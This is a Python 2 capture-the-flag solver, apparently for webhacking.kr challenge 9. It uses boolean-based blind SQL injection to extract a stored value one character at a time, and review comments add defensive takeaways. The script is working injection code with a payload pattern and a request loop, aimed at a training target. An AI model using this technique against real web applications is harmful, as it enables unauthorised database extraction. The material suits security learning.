# Code by rootnix ( rootnix.in ) @ 2015-08-05
#
# Boolean-based blind SQL injection solver for webhacking.kr challenge 9
# (a deliberately vulnerable training target). Python 2 only: it depends on
# urllib2.
#
# NOTE(review): this listing was collapsed onto one line; the loop nesting
# below is reconstructed from the statement order and should be checked
# against the author's original file.
#
# What the script shows about the target:
#   * The `no` query parameter reaches a SQL statement unescaped, so a
#     conditional expression placed in it is evaluated by the database.
#   * The response body differs depending on the result (the marker text
#     "Secret" appears or not), which acts as a one-bit oracle per request.
# Defensive takeaways: bind `no` as a typed/parameterized value or validate
# it as a plain integer, return a uniform response for invalid input, and
# alert on bursts of requests whose query string carries SQL function names
# or that use an unexpected HTTP method.
__author__ = 'rootnix'

import re
import urllib
import urllib2

print("-----------------------------------------------")
print(" Blind SQL Injection Script FOR Challenge 9")
print(" Script by rootnix / http://rootnix.in")
print("-----------------------------------------------")

password = ""
leng = 11  # number of character positions probed (hard-coded by the author)
SESSION = "YOUR SESSION KEY FROM COOKIE"  # placeholder; filled in by the user
base_url = "http://webhacking.kr/challenge/web/web-09/?no="

for position in range(1, leng + 1):
    print("%d/%d Progress..." % (position, leng))

    # Candidate byte values 97..125 (ASCII 'a' through '}'), tried in order.
    for code in range(97, 126):
        # The candidate is sent as a hex literal (e.g. 0x61). The expression
        # reads the `id` column even though the result is labelled
        # "Password"/"Flag" in the output.
        condition = "IF((substr(id,%s,1)IN(%s)),3,0)" % (position, hex(code))
        request = urllib2.Request(base_url + condition)

        # The author overrides the HTTP method to OPTIONS.
        # NOTE(review): the reason is not stated on the page.
        request.get_method = lambda: 'OPTIONS'
        request.add_header('Cookie', "PHPSESSID=%s" % (SESSION))

        body = urllib2.urlopen(request).read()

        # "Secret" in the response marks a true condition for this candidate.
        if re.search("Secret", body):
            password += chr(code)
            print("Now Password:" + password)
            break

print("---------------------------------------------")
print(" RESULT")
print(" Flag : %s" % (password))
print("")
print("---------------------------------------------")